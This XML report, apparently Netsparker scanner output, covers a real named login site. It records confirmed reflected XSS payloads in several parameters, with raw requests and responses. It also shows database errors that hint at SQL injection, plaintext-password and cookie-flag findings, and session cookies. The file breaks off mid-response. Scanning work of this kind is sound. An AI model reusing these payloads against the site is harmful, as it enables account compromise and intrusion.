	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/default.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>message</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000F7)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /default.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F7)%3C/script%3E HTTP/1.1
Referer: http://login.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2321
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:45:49 GMT




&lt;html&gt;

&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=windows-1252&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;CACHE-CONTROL&quot; CONTENT=&quot;NO-CACHE&quot;&gt;
	
	&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;App_Themes/Default/vindico.css&quot;&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	function Login()
	{
		MainForm.submit()
	}	
	
	function ResetPassword()
	{
	    var url = &quot;/AccountManager/ResetPassword/index.asp&quot;;
	    var name = &quot;WINDOW_RESETPASS&quot;;
	    var features = &quot;width=500,height=370&quot;;
	    
	    window.open(url,name, features)
	}   
	
	&lt;/script&gt;

&lt;/head&gt;

&lt;body&gt;

	&lt;table class=&quot;SiteTable&quot; id=&quot;table2&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot; style=&quot;border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px&quot;&gt;
		&lt;img border=&quot;0&quot; src=&quot;App_Themes/Default/defaul2.gif&quot;&gt;&lt;/td&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot;&gt;&lt;div class = &quot;loggedInAs&quot;&gt;
		
			&lt;form method=&quot;POST&quot; action=&quot;vindico_dynamic.asp&quot; name = &quot;MainForm&quot;&gt;
				&lt;table cellpadding=&quot;0&quot; width=&quot;317&quot; style=&quot;border-collapse: collapse&quot; border=&quot;1&quot; bordercolor=&quot;#C0C0C0&quot; id=&quot;table3&quot; height=&quot;152&quot;&gt;
				&lt;tr&gt;
					&lt;td height=&quot;152&quot; bgcolor=&quot;#E7E7D6&quot;&gt;
						&lt;div align=&quot;center&quot;&gt;
						&lt;table cellpadding=&quot;0&quot; style=&quot;border-collapse: collapse&quot; id=&quot;table4&quot; width=&quot;247&quot; height=&quot;85&quot;&gt;
							
							&lt;tr&gt;
								&lt;td width=&quot;247&quot; height=&quot;33&quot; colspan=&quot;2&quot;&gt;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000F7)&lt;/script&gt;&lt;/td&gt;
							&lt;/tr&gt;
							
							
							&lt;tr&gt;
								&lt;td width=&quot;64&quot; height=&quot;33&quot;&gt;&lt;b&gt;Username:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;33&quot;&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;15&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td width=&quot;64&quot;  height=&quot;25&quot;&gt;&lt;b&gt;Password:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;25&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td colspan=&quot;2&quot; align=&quot;left&quot; height=&quot;21&quot;&gt;
								    &lt;br /&gt;
								    &lt;input name=&quot;loginBtn&quot;          class=&quot;button&quot; type=&quot;submit&quot; value = &quot;Login&quot; onclick = &quot;Login();&quot;/&gt;
								    &lt;input name=&quot;resetPasswordBtn&quot;  class=&quot;button&quot; type=&quot;button&quot; value = &quot;Reset Password&quot; onclick = &quot;ResetPassword()&quot;/&gt;
								&lt;/td&gt;
							&lt;/tr&gt;
						&lt;/table&gt;
						&lt;/div&gt;
					&lt;/td&gt;
				&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/form&gt;
		&lt;/div&gt;&lt;/td&gt;
	&lt;/tr&gt;
	&lt;/table&gt;

&lt;/body&gt;

&lt;/html&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000F8)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 152
Accept-Encoding: gzip, deflate

username=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000F8)%3c%2fscript%3e&amp;password=3&amp;loginBtn=Login&amp;resetPasswordBtn=Reset+Password
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:45:49 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000F8)&lt;/script&gt;&apos;, @password = &apos;3&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000FF)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 156
Accept-Encoding: gzip, deflate

username=Smith&amp;password=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000FF)%3c%2fscript%3e&amp;loginBtn=Login&amp;resetPasswordBtn=Reset+Password
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:15 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000FF)&lt;/script&gt;&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000114)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 120
Accept-Encoding: gzip, deflate

username=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000114)%3c%2fscript%3e&amp;password=3&amp;loginBtn=Login
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:21 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000114)&lt;/script&gt;&apos;, @password = &apos;3&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000117)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 124
Accept-Encoding: gzip, deflate

username=Smith&amp;password=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000117)%3c%2fscript%3e&amp;loginBtn=Login
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:24 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000117)&lt;/script&gt;&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000124)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>message</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000124)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/index.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000124)%3C/script%3E HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 47
Accept-Encoding: gzip, deflate

username=Smith&amp;existingPassword=3&amp;newPassword=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:30 GMT




&lt;!DOCTYPE html&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;!-- 
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
 --&gt;
&lt;head&gt;
	&lt;title&gt;Password Reset&lt;/title&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	    
        function Handle_EmailPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            var username = document.getElementById(&quot;username&quot;).value;
            
            if (username == &quot;&quot;) {
                alert(&quot;A username/email address is required to reset the password.&quot;);
                return;
            } else {
                MainForm.action = &quot;Exec_ResetAndEmail.asp&quot;;
                MainForm.submit();
            }
        }
        
        function Handle_ResetPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            MainForm.action = &quot;Exec_Reset.asp&quot;;
            MainForm.submit();	
        }
	&lt;/script&gt;
	
&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;../../App_Themes/Default/vindico2.css&quot;&gt;
	
	&lt;style type=&quot;text/css&quot;&gt;	
        body {
            margin: 10px;
        }
        
        .divMessage {
            margin-bottom: 8px;
            font-weight: bold;
            background-color: #d4e5ae;
            border: 1px solid green;	
            color: black;
            padding: 6px;
        }
	&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;

    &lt;div style=&quot;float: right;&quot;&gt;&lt;a style=&quot;color:blue;&quot; href=&quot;#close&quot; onclick=&quot;window.close();&quot;&gt;close window&lt;/a&gt;&lt;/div&gt;
    &lt;h3&gt;VINDICO Password Reset&lt;/h3&gt;
    
    &lt;div class=&apos;divMessage&apos;&gt;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000124)&lt;/script&gt;&lt;/div&gt;

    &lt;form name = &quot;frm&quot; id=&quot;frm&quot; action = &quot;&quot; method = &quot;Post&quot; autocomplete=&quot;off&quot;&gt;
        &lt;table cellpadding=&quot;5&quot; cellspacing=&quot;0&quot; border = &quot;0&quot; style=&quot;width: 100%;&quot;&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;username (email):&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input id=&quot;username&quot; type =&quot;text&quot; value= &quot;&quot; name=&quot;username&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;current password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;existingPassword&quot; value= &quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;new password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;newPassword&quot; value=&quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;&lt;/td&gt;
                &lt;td&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset password&quot; onclick = &quot;Handle_ResetPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    &lt;hr noshade size=&quot;1&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=&quot;2&quot;&gt;
                    If you &lt;strong&gt;can&apos;t remember your password, enter your username&lt;/strong&gt; 
                    (should be your email address) 
                    in the username field above. Then, &lt;strong&gt;click &apos;Reset and Email&apos;&lt;/strong&gt; 
                    and an email will be sent containing your new password.
                    &lt;br&gt;&lt;br&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset and email&quot; onclick = &quot;Handle_EmailPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;		
        &lt;/table&gt;
        &lt;hr noshade size=&quot;1&quot;&gt;
	&lt;/form&gt;
&lt;/body&gt;

&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp</url>
		<type>PasswordOverHTTP</type>
		<severity>Important</severity>
		

		<rawrequest><![CDATA[GET /AccountManager/ResetPassword/index.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3603
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT




&lt;!DOCTYPE html&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;!-- 
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
 --&gt;
&lt;head&gt;
	&lt;title&gt;Password Reset&lt;/title&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	    
        function Handle_EmailPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            var username = document.getElementById(&quot;username&quot;).value;
            
            if (username == &quot;&quot;) {
                alert(&quot;A username/email address is required to reset the password.&quot;);
                return;
            } else {
                MainForm.action = &quot;Exec_ResetAndEmail.asp&quot;;
                MainForm.submit();
            }
        }
        
        function Handle_ResetPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            MainForm.action = &quot;Exec_Reset.asp&quot;;
            MainForm.submit();	
        }
	&lt;/script&gt;
	
&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;../../App_Themes/Default/vindico2.css&quot;&gt;
	
	&lt;style type=&quot;text/css&quot;&gt;	
        body {
            margin: 10px;
        }
        
        .divMessage {
            margin-bottom: 8px;
            font-weight: bold;
            background-color: #d4e5ae;
            border: 1px solid green;	
            color: black;
            padding: 6px;
        }
	&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;

    &lt;div style=&quot;float: right;&quot;&gt;&lt;a style=&quot;color:blue;&quot; href=&quot;#close&quot; onclick=&quot;window.close();&quot;&gt;close window&lt;/a&gt;&lt;/div&gt;
    &lt;h3&gt;VINDICO Password Reset&lt;/h3&gt;
    
    

    &lt;form name = &quot;frm&quot; id=&quot;frm&quot; action = &quot;&quot; method = &quot;Post&quot; autocomplete=&quot;off&quot;&gt;
        &lt;table cellpadding=&quot;5&quot; cellspacing=&quot;0&quot; border = &quot;0&quot; style=&quot;width: 100%;&quot;&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;username (email):&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input id=&quot;username&quot; type =&quot;text&quot; value= &quot;&quot; name=&quot;username&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;current password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;existingPassword&quot; value= &quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;new password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;newPassword&quot; value=&quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;&lt;/td&gt;
                &lt;td&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset password&quot; onclick = &quot;Handle_ResetPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    &lt;hr noshade size=&quot;1&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=&quot;2&quot;&gt;
                    If you &lt;strong&gt;can&apos;t remember your password, enter your username&lt;/strong&gt; 
                    (should be your email address) 
                    in the username field above. Then, &lt;strong&gt;click &apos;Reset and Email&apos;&lt;/strong&gt; 
                    and an email will be sent containing your new password.
                    &lt;br&gt;&lt;br&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset and email&quot; onclick = &quot;Handle_EmailPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;		
        &lt;/table&gt;
        &lt;hr noshade size=&quot;1&quot;&gt;
	&lt;/form&gt;
&lt;/body&gt;

&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
			<info name="Form target action">Exec_Reset.asp</info>
		</extrainformation>


        <classification>
            <OWASP>A9</OWASP>
            <WASC>04</WASC>
            <CWE>311</CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/</url>
		<type>AutoCompleteEnabled</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT




&lt;html&gt;

&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=windows-1252&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;CACHE-CONTROL&quot; CONTENT=&quot;NO-CACHE&quot;&gt;
	
	&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;App_Themes/Default/vindico.css&quot;&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	function Login()
	{
		MainForm.submit()
	}	
	
	function ResetPassword()
	{
	    var url = &quot;/AccountManager/ResetPassword/index.asp&quot;;
	    var name = &quot;WINDOW_RESETPASS&quot;;
	    var features = &quot;width=500,height=370&quot;;
	    
	    window.open(url,name, features)
	}   
	
	&lt;/script&gt;

&lt;/head&gt;

&lt;body&gt;

	&lt;table class=&quot;SiteTable&quot; id=&quot;table2&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot; style=&quot;border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px&quot;&gt;
		&lt;img border=&quot;0&quot; src=&quot;App_Themes/Default/defaul2.gif&quot;&gt;&lt;/td&gt;
		&lt;td align=&quot;center&quot; width=&quot;50%&quot;&gt;&lt;div class = &quot;loggedInAs&quot;&gt;
		
			&lt;form method=&quot;POST&quot; action=&quot;vindico_dynamic.asp&quot; name = &quot;MainForm&quot;&gt;
				&lt;table cellpadding=&quot;0&quot; width=&quot;317&quot; style=&quot;border-collapse: collapse&quot; border=&quot;1&quot; bordercolor=&quot;#C0C0C0&quot; id=&quot;table3&quot; height=&quot;152&quot;&gt;
				&lt;tr&gt;
					&lt;td height=&quot;152&quot; bgcolor=&quot;#E7E7D6&quot;&gt;
						&lt;div align=&quot;center&quot;&gt;
						&lt;table cellpadding=&quot;0&quot; style=&quot;border-collapse: collapse&quot; id=&quot;table4&quot; width=&quot;247&quot; height=&quot;85&quot;&gt;
							
							&lt;tr&gt;
								&lt;td width=&quot;247&quot; height=&quot;33&quot; colspan=&quot;2&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							
							
							&lt;tr&gt;
								&lt;td width=&quot;64&quot; height=&quot;33&quot;&gt;&lt;b&gt;Username:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;33&quot;&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;15&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td width=&quot;64&quot;  height=&quot;25&quot;&gt;&lt;b&gt;Password:&lt;/b&gt;&lt;/td&gt;
								&lt;td width=&quot;183&quot; height=&quot;25&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot;&gt;&lt;/td&gt;
							&lt;/tr&gt;
							&lt;tr&gt;
								&lt;td colspan=&quot;2&quot; align=&quot;left&quot; height=&quot;21&quot;&gt;
								    &lt;br /&gt;
								    &lt;input name=&quot;loginBtn&quot;          class=&quot;button&quot; type=&quot;submit&quot; value = &quot;Login&quot; onclick = &quot;Login();&quot;/&gt;
								    &lt;input name=&quot;resetPasswordBtn&quot;  class=&quot;button&quot; type=&quot;button&quot; value = &quot;Reset Password&quot; onclick = &quot;ResetPassword()&quot;/&gt;
								&lt;/td&gt;
							&lt;/tr&gt;
						&lt;/table&gt;
						&lt;/div&gt;
					&lt;/td&gt;
				&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/form&gt;
		&lt;/div&gt;&lt;/td&gt;
	&lt;/tr&gt;
	&lt;/table&gt;

&lt;/body&gt;

&lt;/html&gt; ]]></rawresponse>

		<extrainformation>
			<info name="Identified Field Name">password</info>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/</url>
		<type>CookieNotMarkedAsHttpOnly</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT




&lt;html&gt;

&lt;head&gt;
	&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=windows-1252&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;CACHE-CONTROL&quot; CONTENT=&quot;NO-CACHE&quot;&gt;
	
	&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;App_Themes/Default/vindico.css&quot;&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
